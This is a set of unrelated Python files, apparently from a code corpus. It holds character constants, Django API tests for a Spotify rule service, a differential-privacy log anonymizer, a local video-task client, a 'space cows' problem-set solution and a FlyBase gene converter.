minus, times, plusminus = '−', '×', '±'
inf, null = '∞', '⌀'
prop, approx, leq, geq = '∝', '≈', '≤', '≥'
nott, implies, iff, forall, exists, notexists = '¬', '⇒', '⇔', '∀', '∃', '∄'
vee, wedge, cup, cap = '∨', '∧', '∪', '∩'
isin, contains, complement = '∈', '∋', '∁'
precedes, succeeds = '≺', '≻'
prime, partial, integral = '′', '∂', '∫'
# info marks
bullet = '•'
dagger, ddagger = '†', '‡'
star, snowflake = '★', '⁕'
info, caution, warning, donotenter, noentry = '🛈', '☡', '⚠', '⛔', '🚫'
trash, skull, atom, radiation, bioharzard = '🗑', '☠', '⚛', '☢', '☣'
corners = '⛶'
# misc / UI
left, right, cycle, fatright = '←', '→', '⟳', '⮕'
check, x = '✔', '✘'
smile, frown, happy, worried, confused = '🙂', '☹', '😃', '😟', '😕'
circle, square, triangle = '⚪', '◼', '▶'
vline, hline, vdots = '|', '―', '⁞'
bar, pipe, brokenbar, tech, zigzag = '―', '‖', '¦', '⌇', '⦚'
# brackets
langle, rangle = '⟨', '⟩'
lshell, rshell = '⦗', '⦘'
ldbracket, rdbracket = '⟦', '〛'
ldshell, rdshell = '〘', '〙'
ldparen, rdparen = '⸨', '⸩'
ldangle, rdangle = '《', '》'
# greek
alpha, beta, gamma, delta, epsilon, eta, theta, zeta, kappa = 'α', 'β', 'γ', 'δ', 'ε', 'η', 'θ', 'ζ', 'κ'
Gamma, Delta, Pi, Sigma, Omega = 'Γ', 'Δ', 'Π', 'Σ', 'Ω'
lamba = 'λ' # spelled wrong
nu, mu, xi, tau, pi, sigma, phi, psi, omega = 'ν', 'μ', 'ξ', 'τ', 'π', 'σ', 'φ', 'ψ', 'ω'
varphi = 'φ'
@staticmethod
def squoted(s: str) -> str:
"""Wrap a string in singsle quotes."""
return Chars.lsq + str(s) + Chars.rsq
@staticmethod
def dquoted(s: str) -> str:
"""Wrap a string in double quotes."""
return Chars.ldq + str(s) + Chars.rdq
@staticmethod
def angled(s: str) -> str:
"""Wrap a string in angled brackets."""
return Chars.langle + str(s) + Chars.rangle
@staticmethod
def dangled(s: str) -> str:
"""Wrap a string in double brackets."""
return Chars.ldangle + str(s) + Chars.rdangle
@staticmethod
def parened(s: str) -> str:
"""Wrap a string in parentheses."""
return '(' + str(s) + ')'
@staticmethod
def bracketed(s: str) -> str:
"""Wrap a string in square brackets."""
return '[' + str(s) + ']'
@staticmethod
def braced(s: str) -> str:
"""Wrap a string in curly braces."""
return '{' + str(s) + '}'
@staticmethod
def shelled(s: str) -> str:
"""Wrap a string in tortiose shell brackets (〔 〕)."""
return '〔' + str(s) + '〕'
@staticmethod
def dbracketed(s: str) -> str:
"""Wrap a string in double square brackets (⟦ ⟧)."""
return Chars.ldbracket + str(s) + Chars.rdbracket
__all__ = ['Chars'] |
<gh_stars>0
import logging
from unittest import mock
from django.contrib.auth.models import User
from django.test import SimpleTestCase, TestCase
from django.urls import reverse
from freezegun import freeze_time
from rest_framework.test import APIClient
from api.service_checks import ServiceStatus
from data.exceptions import BadSpotifyTrackID
from data.models import Rule, SongSequenceMember
class TestRuleList(TestCase):
def setUp(self):
# Squelch logging for these tests.
logging.disable(logging.CRITICAL)
self.test_user_1 = User.objects.create(username="test1")
self.test_user_2 = User.objects.create(username="test2")
self.test_user_3 = User.objects.create(username="test3")
with freeze_time("2020-08-15"):
self.test_rule_1 = Rule.objects.create(
owner=self.test_user_1, trigger_song_spotify_id="foo"
)
with freeze_time("2020-08-17"):
self.test_rule_2 = Rule.objects.create(
owner=self.test_user_2, trigger_song_spotify_id="bar"
)
self.test_rule_3 = Rule.objects.create(
owner=self.test_user_1, trigger_song_spotify_id="baz"
)
def tearDown(self):
# Reenable logging when tests finish.
logging.disable(logging.NOTSET)
def test_get_only_owner_rules(self):
client = APIClient()
client.force_authenticate(self.test_user_1)
response = client.get(reverse("rule-list"))
# Make sure that we only got two rules, the ones owned by test_user_1.
self.assertEqual(len(response.data), 2)
# Make sure that they are ordered by descending date created.
self.assertEqual(response.data[0]["id"], self.test_rule_3.id)
self.assertEqual(response.data[1]["id"], self.test_rule_1.id)
def test_no_rules(self):
client = APIClient()
client.force_authenticate(self.test_user_3)
response = client.get(reverse("rule-list"))
self.assertEqual(response.data, [])
def test_unauthenticated(self):
client = APIClient()
response = client.get(reverse("rule-list"))
self.assertEqual(response.status_code, 403)
class TestRuleDetail(TestCase):
def setUp(self):
# Squelch logging for these tests.
logging.disable(logging.CRITICAL)
self.test_user_1 = User.objects.create(username="test1")
self.test_user_2 = User.objects.create(username="test2")
self.test_rule_1 = Rule.objects.create(
owner=self.test_user_1,
trigger_song_spotify_id="foo",
is_active=True,
)
def tearDown(self):
# Reenable logging when tests finish.
logging.disable(logging.NOTSET)
def test_get(self):
client = APIClient()
client.force_authenticate(self.test_user_1)
response = client.get(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id})
)
self.assertEqual(response.status_code, 200)
def test_get_someone_elses_rule(self):
client = APIClient()
client.force_authenticate(self.test_user_2)
response = client.get(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id})
)
self.assertEqual(response.status_code, 403)
def test_get_unauthenticated(self):
client = APIClient()
response = client.get(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id})
)
self.assertEqual(response.status_code, 403)
def test_get_not_found_authenticated(self):
client = APIClient()
client.force_authenticate(self.test_user_1)
rule_id = self.test_rule_1.id
self.test_rule_1.delete()
response = client.get(reverse("rule-detail", kwargs={"pk": rule_id}))
self.assertEqual(response.status_code, 404)
def test_get_not_found_unauthenticated(self):
client = APIClient()
rule_id = self.test_rule_1.id
self.test_rule_1.delete()
response = client.get(reverse("rule-detail", kwargs={"pk": rule_id}))
self.assertEqual(response.status_code, 403)
@mock.patch("api.serializers.Rule.set_name")
def test_put(self, mock_set_name):
client = APIClient()
client.force_authenticate(self.test_user_1)
response = client.put(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id}),
{
"trigger_song_spotify_id": "bar",
"song_sequence": [],
"is_active": False,
},
format="json",
)
self.test_rule_1.refresh_from_db()
self.assertEqual(response.status_code, 200)
self.assertEqual(self.test_rule_1.trigger_song_spotify_id, "bar")
self.assertFalse(self.test_rule_1.is_active)
mock_set_name.assert_called_once()
@mock.patch("api.serializers.Rule.set_name")
def test_put_bad_track(self, mock_set_name):
client = APIClient()
client.force_authenticate(self.test_user_1)
mock_set_name.side_effect = BadSpotifyTrackID("terrible_track_id")
response = client.put(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id}),
{
"trigger_song_spotify_id": "terrible_track_id",
"song_sequence": [],
"is_active": False,
},
format="json",
)
self.test_rule_1.refresh_from_db()
self.assertEqual(response.status_code, 400)
self.assertIn("terrible_track_id", response.data[0])
mock_set_name.assert_called_once()
# Ensure atomicity
self.assertEqual(self.test_rule_1.trigger_song_spotify_id, "foo")
self.assertTrue(self.test_rule_1.is_active)
def test_put_someone_elses_rule(self):
client = APIClient()
client.force_authenticate(self.test_user_2)
response = client.put(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id}),
{
"trigger_song_spotify_id": "bar",
"song_sequence": [],
"is_active": False,
},
format="json",
)
self.test_rule_1.refresh_from_db()
self.assertEqual(response.status_code, 403)
self.assertEqual(self.test_rule_1.trigger_song_spotify_id, "foo")
self.assertTrue(self.test_rule_1.is_active)
def test_put_unauthenticated(self):
client = APIClient()
response = client.put(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id}),
{
"trigger_song_spotify_id": "bar",
"song_sequence": [],
"is_active": False,
},
format="json",
)
self.test_rule_1.refresh_from_db()
self.assertEqual(response.status_code, 403)
self.assertEqual(self.test_rule_1.trigger_song_spotify_id, "foo")
self.assertTrue(self.test_rule_1.is_active)
def test_delete(self):
client = APIClient()
client.force_authenticate(self.test_user_1)
response = client.delete(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id})
)
self.assertEqual(response.status_code, 204)
self.assertEqual(Rule.objects.count(), 0)
def test_delete_someone_elses_rule(self):
client = APIClient()
client.force_authenticate(self.test_user_2)
response = client.delete(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id})
)
self.assertEqual(response.status_code, 403)
self.assertEqual(Rule.objects.count(), 1)
def test_delete_unauthenticated(self):
client = APIClient()
response = client.delete(
reverse("rule-detail", kwargs={"pk": self.test_rule_1.id})
)
self.assertEqual(response.status_code, 403)
self.assertEqual(Rule.objects.count(), 1)
class TestCreateRule(TestCase):
def setUp(self):
# Squelch logging for these tests.
logging.disable(logging.CRITICAL)
self.test_user_1 = User.objects.create(username="test1")
def tearDown(self):
# Reenable logging when tests finish.
logging.disable(logging.NOTSET)
def test_get(self):
client = APIClient()
client.force_authenticate(self.test_user_1)
response = client.get(reverse("rule-create"))
self.assertEqual(response.status_code, 405)
@mock.patch("api.serializers.Rule.set_name")
def test_post(self, mock_set_name):
client = APIClient()
client.force_authenticate(self.test_user_1)
response = client.post(
reverse("rule-create"),
{
"trigger_song_spotify_id": "foo",
"song_sequence": [],
"is_active": False,
},
format="json",
)
self.assertEqual(response.status_code, 201)
new_rule = Rule.objects.get() # Implicitly tests there's only one Rule
self.assertEqual(new_rule.trigger_song_spotify_id, "foo")
self.assertFalse(new_rule.is_active)
mock_set_name.assert_called_once()
@mock.patch("api.serializers.Rule.set_name")
def test_post_bad_track(self, mock_set_name):
client = APIClient()
client.force_authenticate(self.test_user_1)
mock_set_name.side_effect = BadSpotifyTrackID("terrible_track_id")
response = client.post(
reverse("rule-create"),
{
"trigger_song_spotify_id": "terrible_track_id",
"song_sequence": [],
"is_active": False,
},
format="json",
)
self.assertEqual(response.status_code, 400)
self.assertIn("terrible_track_id", response.data[0])
mock_set_name.assert_called_once()
# Ensure atomicity
self.assertEqual(Rule.objects.count(), 0)
def test_post_duplicate_rule(self):
client = APIClient()
client.force_authenticate(self.test_user_1)
Rule.objects.create(owner=self.test_user_1, trigger_song_spotify_id="dupe")
response = client.post(
reverse("rule-create"),
{
"trigger_song_spotify_id": "dupe",
"song_sequence": [],
"is_active": False,
},
format="json",
)
self.assertEqual(response.status_code, 400)
def test_post_unauthenticated(self):
client = APIClient()
response = client.post(
reverse("rule-create"),
{
"trigger_song_spotify_id": "foo",
"song_sequence": [],
"is_active": False,
},
format="json",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(Rule.objects.count(), 0)
class TestServiceStatus(SimpleTestCase):
def setUp(self):
# Squelch logging for these tests.
logging.disable(logging.CRITICAL)
def tearDown(self):
# Reenable logging when tests finish.
logging.disable(logging.NOTSET)
@mock.patch("api.views.run_checks")
def test_ok(self, mock_run_checks):
mock_run_checks.return_value = (
ServiceStatus.OK,
{"checks": "pass"},
)
client = APIClient()
response = client.get(reverse("service-status"))
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.data,
{
"status": "OK",
"info": {"checks": "pass"},
},
)
@mock.patch("api.views.run_checks")
def test_warning(self, mock_run_checks):
mock_run_checks.return_value = (
ServiceStatus.WARNING,
{"checks": "warning"},
)
client = APIClient()
response = client.get(reverse("service-status"))
self.assertEqual(response.status_code, 200)
self.assertEqual(
response.data,
{
"status": "WARNING",
"info": {"checks": "warning"},
},
)
@mock.patch("api.views.run_checks")
def test_critical(self, mock_run_checks):
mock_run_checks.return_value = (
ServiceStatus.CRITICAL,
{"checks": "critical"},
)
client = APIClient()
response = client.get(reverse("service-status"))
self.assertEqual(response.status_code, 503)
self.assertEqual(
response.data,
{
"status": "CRITICAL",
"info": {"checks": "critical"},
},
)
@mock.patch("api.views.run_checks")
def test_bad_status(self, mock_run_checks):
mock_run_checks.return_value = ("???", {})
client = APIClient()
with self.assertRaises(ValueError):
client.get(reverse("service-status"))
class TestLogout(TestCase):
def setUp(self):
# Squelch logging for these tests.
logging.disable(logging.CRITICAL)
self.test_user = User.objects.create(username="test")
def tearDown(self):
# Reenable logging when tests finish.
logging.disable(logging.NOTSET)
def test_logout(self):
client = APIClient()
client.force_login(self.test_user)
response = client.post(reverse("logout"))
self.assertEqual(response.status_code, 200)
# Try getting a view that needs auth.
response = client.get(reverse("rule-list"))
self.assertEqual(response.status_code, 403)
def test_unauthenticated(self):
client = APIClient()
response = client.post(reverse("logout"))
self.assertEqual(response.status_code, 403)
class TestDeleteAccount(TestCase):
def setUp(self):
# Squelch logging for these tests.
logging.disable(logging.CRITICAL)
self.test_user = User.objects.create(username="test")
self.test_rule = Rule.objects.create(
owner=self.test_user, trigger_song_spotify_id="foo"
)
self.test_ssm = SongSequenceMember.objects.create(
rule=self.test_rule, song_spotify_id="bar", sequence_number=0
)
def tearDown(self):
# Reenable logging when tests finish.
logging.disable(logging.NOTSET)
def test_delete(self):
client = APIClient()
client.force_login(self.test_user)
response = client.delete(reverse("delete-account"))
self.assertEqual(response.status_code, 200)
# Try getting a view that needs auth.
response = client.get(reverse("rule-list"))
self.assertEqual(response.status_code, 403)
# Make sure that the user was deleted.
self.assertEqual(User.objects.count(), 0)
# Also test that the user's data was deleted.
self.assertEqual(Rule.objects.count(), 0)
self.assertEqual(SongSequenceMember.objects.count(), 0)
def test_unauthenticated(self):
client = APIClient()
response = client.post(reverse("delete-account"))
self.assertEqual(response.status_code, 403)
|
import diffprivlib.mechanisms as privacyMechanisms
from datetime import timedelta
import datetime
class AttributeAnonymizier:
def __init__(self):
self.__timestamp = "time:timestamp"
self.__blacklist = self.__getBlacklistOfAttributes()
self.__sensitivity = "sensitivity"
self.__max = "max"
self.__min = "min"
self.__infectionSuspected = list()
def __getBlacklistOfAttributes(self):
blacklist = set()
blacklist.add("concept:name")
blacklist.add(self.__timestamp)
blacklist.add("variant")
blacklist.add("EventID")
blacklist.add("OfferID")
blacklist.add("matricola")
return blacklist
def __retrieveAttributeDomains(self, distributionOfAttributes, dataTypesOfAttributes):
domains = dict()
for attribute in dataTypesOfAttributes.keys():
if dataTypesOfAttributes[attribute] in (int,float):
domain = dict()
domain[self.__max] = max(distributionOfAttributes[attribute])
domain[self.__min] = min(distributionOfAttributes[attribute])
domain[self.__sensitivity] = abs(domain[self.__max] - domain[self.__min])
domains[attribute] = domain
return domains
def __determineDataType(self,distributionOfAttributes):
dataTypesOfAttributes = dict()
for attribute in distributionOfAttributes.keys():
if attribute not in self.__blacklist:
dataTypesOfAttributes[attribute] = type(distributionOfAttributes[attribute][0])
return dataTypesOfAttributes
def __getPotentialValues(self,distributionOfAttributes,dataTypesOfAttributes):
potentialValues = dict()
for attribute in dataTypesOfAttributes:
if dataTypesOfAttributes[attribute] is str:
distribution = distributionOfAttributes[attribute]
values = set(distribution)
potentialValues[attribute] = values
return potentialValues
def __setupBooleanMechanism(self,epsilon):
binaryMechanism = privacyMechanisms.Binary()
binaryMechanism.set_epsilon(epsilon)
binaryMechanism.set_labels(str(True), str(False))
return binaryMechanism
def __anonymizeAttribute(self,value, mechanism):
isBoolean = False
isInt = False
if mechanism is not None:
if type(value) is bool:
isBoolean = True
value = str(value)
if type(value) is int:
isInt = True
value = mechanism.randomise(value)
if isBoolean:
value = eval(value)
if isInt:
value = int(round(value))
return value
def __addBooleanMechansisms(self,epsilon, mechanisms, dataTypesOfAttributes):
binaryMechanism = self.__setupBooleanMechanism(epsilon)
for attribute in dataTypesOfAttributes.keys():
if dataTypesOfAttributes[attribute] is bool:
mechanisms[attribute] = binaryMechanism
return mechanisms
def __addNumericMechanisms(self, epsilon, mechanisms, domains):
for attribute in domains.keys():
sensitivity = domains[attribute][self.__sensitivity]
lowerDomainBound = domains[attribute][self.__min]
upperDomainBound = domains[attribute][self.__max]
laplaceMechanism =privacyMechanisms.LaplaceBoundedDomain()
laplaceMechanism.set_epsilon(epsilon)
laplaceMechanism.set_sensitivity(sensitivity)
laplaceMechanism.set_bounds(lowerDomainBound,upperDomainBound)
mechanisms[attribute] = laplaceMechanism
return mechanisms
def __setupUniformUtitlityList(self,potentialValues):
utilityList = [[x, y,1] for x in potentialValues for y in potentialValues]
return utilityList
def __addCatergoricalMechanisms(self, epsilon, mechanisms, dataTypesOfAttributes, potentialValues):
for attribute in dataTypesOfAttributes.keys():
if dataTypesOfAttributes[attribute] is str:
utilityList = self.__setupUniformUtitlityList(potentialValues[attribute])
if len(utilityList) > 0:
exponentialMechanism = privacyMechanisms.Exponential()
exponentialMechanism.set_epsilon(epsilon)
exponentialMechanism.set_utility(utilityList)
mechanisms[attribute] = exponentialMechanism
return mechanisms
def __getTimestamp(self,trace,eventNr,allTimestamps):
if eventNr <= 0:
return min(allTimestamps)
elif eventNr >= len(trace):
return max(allTimestamps)
else:
return trace[eventNr][self.__timestamp]
def __anonymizeTimeStamps(self,timestamp,previousTimestamp,nextTimestamp,sensitivity,minTimestampDifference,mechanism):
upperPotentialDifference = (nextTimestamp - previousTimestamp).total_seconds()
currentDifference = (timestamp - previousTimestamp).total_seconds()
if upperPotentialDifference < 0:
upperPotentialDifference = currentDifference
mechanism.set_sensitivity(sensitivity).set_bounds(minTimestampDifference,upperPotentialDifference)
timestamp = previousTimestamp + timedelta(seconds=currentDifference)
return timestamp
def __setupMechanisms(self,epsilon,distributionOfAttributes):
mechanisms = dict()
dataTypesOfAttributes = self.__determineDataType(distributionOfAttributes)
mechanisms = self.__addBooleanMechansisms(epsilon,mechanisms, dataTypesOfAttributes)
domains = self.__retrieveAttributeDomains(distributionOfAttributes, dataTypesOfAttributes)
mechanisms = self.__addNumericMechanisms(epsilon,mechanisms,domains)
potentialValues = self.__getPotentialValues(distributionOfAttributes,dataTypesOfAttributes)
mechanisms = self.__addCatergoricalMechanisms(epsilon, mechanisms, dataTypesOfAttributes, potentialValues)
mechanisms[self.__timestamp] = privacyMechanisms.LaplaceBoundedDomain().set_epsilon(epsilon)
return mechanisms
def __getTimestampDomain(self, trace, eventNr, distributionOfTimestamps,allTimestampDifferences):
timestampDomain = self.__domainTimestampData.get(trace[eventNr - 1]["concept:name"],None)
if timestampDomain is not None:
timestampDomain = timestampDomain.get(trace[eventNr]["concept:name"],None)
if timestampDomain is None:
if eventNr != 0:
dictTimestampDifference = distributionOfTimestamps.get(trace[eventNr - 1]["concept:name"],None)
if dictTimestampDifference is not None:
timestampDistribution = dictTimestampDifference.get(trace[eventNr]["concept:name"],None)
if timestampDistribution is None:
maxTimestampDifference = self.__maxAllTimestampDifferences
minTimestampDifference = self.__minAllTimestampDifferences
else:
maxTimestampDifference = max(timestampDistribution)
minTimestampDifference = min(timestampDistribution)
sensitivity = abs(maxTimestampDifference - minTimestampDifference).total_seconds()
sensitivity = max(sensitivity,1.0)
timestampDomain = dict()
timestampDomain["sensitivty"] = sensitivity
timestampDomain["minTimeStampInLog"] = min(allTimestampDifferences).total_seconds()
if self.__domainTimestampData.get(trace[eventNr - 1]["concept:name"],None) is None:
self.__domainTimestampData[trace[eventNr - 1]["concept:name"]] = dict()
self.__domainTimestampData[trace[eventNr - 1]["concept:name"]][trace[eventNr]["concept:name"]] = timestampDomain
return timestampDomain["sensitivty"], timestampDomain["minTimeStampInLog"]
def __performTimestampShift(self,trace,mechanism):
beginOfTrace = trace[0][self.__timestamp]
deltaBeginOfLogToTrace = (self.__minAllTimestamp - beginOfTrace).total_seconds()
endOfTrace = trace[-1][self.__timestamp]
traceDuration = (endOfTrace - beginOfTrace).total_seconds()
deltaEndOfLogToTrace = (self.__maxAllTimestamp - beginOfTrace).total_seconds()
upperBound = deltaEndOfLogToTrace-traceDuration
if deltaBeginOfLogToTrace >= upperBound:
upperBound = abs((self.__maxAllTimestamp - beginOfTrace).total_seconds())
mechanism.set_bounds(deltaBeginOfLogToTrace,upperBound)
timestampShift = timedelta(seconds=mechanism.randomise(0.0))
for event in trace:
event[self.__timestamp] = event[self.__timestamp] + timestampShift
if event[self.__timestamp] < self.__minAllTimestamp:
print("That should not happen")
def anonymize(self, log, distributionOfAttributes, epsilon, allTimestampDifferences,allTimestamps):
print("Setting up the mechanisms")
starttime = datetime.datetime.now()
self.__maxAllTimestampDifferences = max(allTimestampDifferences)
self.__minAllTimestampDifferences = min(allTimestampDifferences)
self.__maxAllTimestamp = max(allTimestamps)
self.__minAllTimestamp = min(allTimestamps)
timeShiftMechanism = privacyMechanisms.LaplaceBoundedDomain()
timeShiftMechanism.set_epsilon(epsilon).set_sensitivity((self.__maxAllTimestamp - self.__minAllTimestamp).total_seconds())
mechanisms = self.__setupMechanisms(epsilon, distributionOfAttributes)
self.__domainTimestampData = dict()
endtime = datetime.datetime.now()
time = endtime - starttime
print("Done with setting up mechanisms after " + str(time))
i = 0
for trace in log:
for eventNr in range(0,len(trace)):
event = trace[eventNr]
for attribute in event.keys():
if attribute != self.__timestamp:
event[attribute] = self.__anonymizeAttribute(event[attribute],mechanisms.get(attribute,None))
if attribute == "InfectionSuspected" and eventNr == 0:
self.__infectionSuspected.append(event[attribute])
elif eventNr > 0:
previousTimestamp = self.__getTimestamp(trace,eventNr - 1,allTimestamps)
nextTimestamp = self.__getTimestamp(trace,eventNr + 1,allTimestamps)
sensitivity, minTimestampDifference = self.__getTimestampDomain(trace, eventNr, distributionOfAttributes[self.__timestamp],allTimestampDifferences)
event[attribute] = self.__anonymizeTimeStamps(event[attribute],previousTimestamp,nextTimestamp,sensitivity,minTimestampDifference,mechanisms[self.__timestamp])
elif eventNr == 0:
self.__performTimestampShift(trace,timeShiftMechanism)
i = i + 1
if (i%100) == 0:
print("Iteration " + str((i)))
return log, self.__infectionSuspected |
# encoding:utf-8
# date:2020-11-30
# author: x.l.eric
# function: dp client
import os
import requests
import base64
import cv2
import json
import numpy as np
import time
import traceback
import random
from pupdb.core import PupDB # 数据库
from dp_utils import *
def create_task_id():
d_ = []
for i in range(6):
d_.append(chr(random.randint(97, 122)))
d_ = "".join(d_)
str_time = time.strftime("%Y-%m-%d-%H-%M-%S", time.localtime())
task_id = "task_{}_{}_{}".format(d_,random.randint(0,65535),str_time)
return task_id
if __name__ == "__main__":
#--------------------------------------------------- 步骤 1 创建任务,发起服务请求
task_id = create_task_id()
print("task_id",task_id)
video_path = "./video/NBA.mp4"
image_path = "./image/test.jpg"
files = {"task_video_file": open(video_path,'rb'),
"task_image_file": open(image_path,'rb'),
};
data = {'task_id': task_id,
"pattern": "video",
}
host = "http://127.0.0.1:"
port = "6666"
request_url = host + port + "/task"
print("\n----->>>step 1 : start task\n")
r = requests.post(request_url,data=data,files=files)
msg = r.json()
for k_ in msg.keys():
print(" {} : {}".format(k_,msg[k_]))
#----------------------------------------------------- 步骤 2 查询任务状态
print("\n----->>>step 2 : get task state\n")
request_url = host + port + "/task_state"
flag_break = False
while True:
st_ = time.time()
time.sleep(1)
r = requests.get(request_url, data = {"task_id":task_id})
et_ = time.time()
msg = r.json()
for k_ in msg.keys():
print("{} : {}".format(k_,msg[k_]))
if msg[k_] =="done":
flag_break = True
break
if flag_break:
break
#------------------------------------------------------ 步骤 3 获取算法可视化结果 图像
print("\n----->>>step 3 : get image_target_file \n")
request_url = host + port + "/target_image_file"
st_ = time.time()
r = requests.get(request_url, data={"task_id":task_id},timeout=600)
et_ = time.time()
if not os.path.exists('./target_image'):
os.mkdir('./target_image')
target_file = "./target_image/target_{}.jpg".format(task_id)
with open(target_file, 'wb') as file_:
print("save image target file ~")
file_.write(r.content)
img_ = cv2.imread(target_file)
cv2.namedWindow("target_image",0)
cv2.imshow("target_image",img_)
cv2.waitKey(0)
cv2.destroyAllWindows()
#------------------------------------------------------ 步骤 4 获取算法可视化结果 视频
print("\n----->>>step 4 : get video_target_file \n")
request_url = host + port + "/target_video_file"
st_ = time.time()
r = requests.get(request_url, data={"task_id":task_id},timeout=600)
et_ = time.time()
if not os.path.exists('./target_video'):
os.mkdir('./target_video')
target_file = "./target_video/target_{}.mp4".format(task_id)
with open(target_file, 'wb') as file_:
print("save video target file ~")
file_.write(r.content)
#----------------------------------------------------- 步骤 5 本地显示结果文件 - 视频
print("\n----->>>step 5 : show target file \n")
show_video(target_file)
|
<gh_stars>0
###########################
# 6.00.2x Problem Set 1: Space Cows
from ps1_partition import get_partitions
import time
#================================
# Part A: Transporting Space Cows
#================================
def load_cows(filename):
"""
Read the contents of the given file. Assumes the file contents contain
data in the form of comma-separated cow name, weight pairs, and return a
dictionary containing cow names as keys and corresponding weights as values.
Parameters:
filename - the name of the data file as a string
Returns:
a dictionary of cow name (string), weight (int) pairs
"""
cow_dict = dict()
f = open(filename, 'r')
for line in f:
line_data = line.split(',')
cow_dict[line_data[0]] = int(line_data[1])
return cow_dict
# Problem 1
def greedy_cow_transport(cows, limit=10):
"""
Uses a greedy heuristic to determine an allocation of cows that attempts to
minimize the number of spaceship trips needed to transport all the cows. The
returned allocation of cows may or may not be optimal.
The greedy heuristic should follow the following method:
1. As long as the current trip can fit another cow, add the largest cow that will fit
to the trip
2. Once the trip is full, begin a new trip to transport the remaining cows
Does not mutate the given dictionary of cows.
Parameters:
cows - a dictionary of name (string), weight (int) pairs
limit - weight limit of the spaceship (an int)
Returns:
A list of lists, with each inner list containing the names of cows
transported on a particular trip and the overall list containing all the
trips
"""
# Create a sorted list of cows, in descending order by weight
sortedCows = [k for v,k in sorted([(v,k) for k,v in cows.items()], reverse = True)]
# Initialize variable which will store the list of trips
result = []
# Initialize variable to keep track of cows left and cows used
cowsLeft = len(sortedCows)
cowsUsed = []
# Keep going until all cows used
while cowsLeft > 0:
# Initialize variable to store each trip
trip = []
# Initialize variable to store weight on current trip
weight = 0
# Iterate through each cow in the sorted list
for item in sortedCows:
# Check if cow has been used yet
if item not in cowsUsed:
# Check if there is still room on this trip
if weight + cows[item] <= limit:
# Add cow to this trip
trip.append(item)
# Mark cow as having been used
cowsUsed.append(item)
cowsLeft -= 1
# Add cow to the weight of this trip
weight += cows[item]
result.append(trip)
# Return best result
return result
# Problem 2
def brute_force_cow_transport(cows,limit=10):
"""
Finds the allocation of cows that minimizes the number of spaceship trips
via brute force. The brute force algorithm should follow the following method:
1. Enumerate all possible ways that the cows can be divided into separate trips
2. Select the allocation that minimizes the number of trips without making any trip
that does not obey the weight limitation
Does not mutate the given dictionary of cows.
Parameters:
cows - a dictionary of name (string), weight (int) pairs
limit - weight limit of the spaceship (an int)
Returns:
A list of lists, with each inner list containing the names of cows
transported on a particular trip and the overall list containing all the
trips
"""
# create power list using helper function, and sort it - shortest first!
power_list = sorted(get_partitions(cows), key = len)
# Note that this returns a list of names (strings), and we will need to do
# dictionary lookup later
# Now time to filter the power list:
possibilities = []
for i in power_list:
ship = []
for j in i:
ship_weights = []
for k in j:
ship_weights.append(cows[k])
ship.append(sum(ship_weights))
if all(d <= limit for d in ship):
possibilities.append(i)
# possibiliies now contains some duplicates, which need to be removed
pruned_possibilities = []
for k in possibilities:
if k not in pruned_possibilities:
pruned_possibilities.append(k)
# now find the minimum list length:
min_list_len = min(map(len, pruned_possibilities))
for l in pruned_possibilities:
if len(l) == min_list_len:
return l
# Problem 3
def compare_cow_transport_algorithms():
"""
Using the data from ps1_cow_data.txt and the specified weight limit, run your
greedy_cow_transport and brute_force_cow_transport functions here. Use the
default weight limits of 10 for both greedy_cow_transport and
brute_force_cow_transport.
Print out the number of trips returned by each method, and how long each
method takes to run in seconds.
Returns:
Does not return anything.
"""
start = time.time()
greedy_cow_transport(cows, 10)
end = time.time()
print(end - start)
start = time.time()
brute_force_cow_transport(cows, 10)
end = time.time()
print(end - start)
cows = load_cows("ps1_cow_data.txt")
limit=100
print(cows)
compare_cow_transport_algorithms()
|
# -*- coding: utf-8 -*-
"""Converter for FlyBase Genes."""
import logging
from typing import Iterable, Mapping, Optional, Set
import click
import pandas as pd
from more_click import verbose_option
from tqdm import tqdm
from pyobo import Reference
from pyobo.struct import Obo, Term, from_species, orthologous
from pyobo.utils.io import multisetdict
from pyobo.utils.path import ensure_df
logger = logging.getLogger(__name__)
BASE_URL = "http://ftp.flybase.net/releases"
PREFIX = "flybase"
NAME = "FlyBase"
def _get_version(version: Optional[str] = None) -> str:
if version is not None:
return version
import bioversions
return bioversions.get_version("flybase")
def _get_names(version: Optional[str] = None, force: bool = False) -> pd.DataFrame:
version = _get_version(version)
url = f"{BASE_URL}/FB{version}/precomputed_files/genes/fbgn_fbtr_fbpp_expanded_fb_{version}.tsv.gz"
df = ensure_df(
PREFIX,
url=url,
force=force,
version=version,
skiprows=4,
usecols=[0, 1, 2, 3, 4],
skipfooter=1,
)
return df
def _get_organisms(version: Optional[str] = None, force: bool = False) -> Mapping[str, str]:
"""Get mapping from abbreviation column to NCBI taxonomy ID column."""
version = _get_version(version)
url = f"http://ftp.flybase.net/releases/FB{version}/precomputed_files/species/organism_list_fb_{version}.tsv.gz"
df = ensure_df(
PREFIX, url=url, force=force, version=version, skiprows=4, header=None, usecols=[2, 4]
)
df.dropna(inplace=True)
return dict(df.values)
def _get_definitions(version: Optional[str] = None, force: bool = False) -> Mapping[str, str]:
version = _get_version(version)
url = f"http://ftp.flybase.net/releases/FB{version}/precomputed_files/genes/automated_gene_summaries.tsv.gz"
df = ensure_df(
PREFIX, url=url, force=force, version=version, skiprows=2, header=None, usecols=[0, 1]
)
return dict(df.values)
def _get_human_orthologs(
version: Optional[str] = None, force: bool = False
) -> Mapping[str, Set[str]]:
version = _get_version(version)
url = (
f"http://ftp.flybase.net/releases/FB{version}/precomputed_files/"
f"orthologs/dmel_human_orthologs_disease_fb_{version}.tsv.gz"
)
df = ensure_df(
PREFIX,
url=url,
force=force,
version=version,
skiprows=2,
header=None,
usecols=[0, 2],
names=["flybase_id", "hgnc_id"],
)
return multisetdict(df.values)
def _get_synonyms(version, force):
version = _get_version(version)
url = f"http://ftp.flybase.net/releases/FB{version}/precomputed_files/synonyms/fb_synonym_fb_{version}.tsv.gz"
df = ensure_df(PREFIX, url=url, force=force, version=version, skiprows=4, usecols=[0, 2])
return df # TODO use this
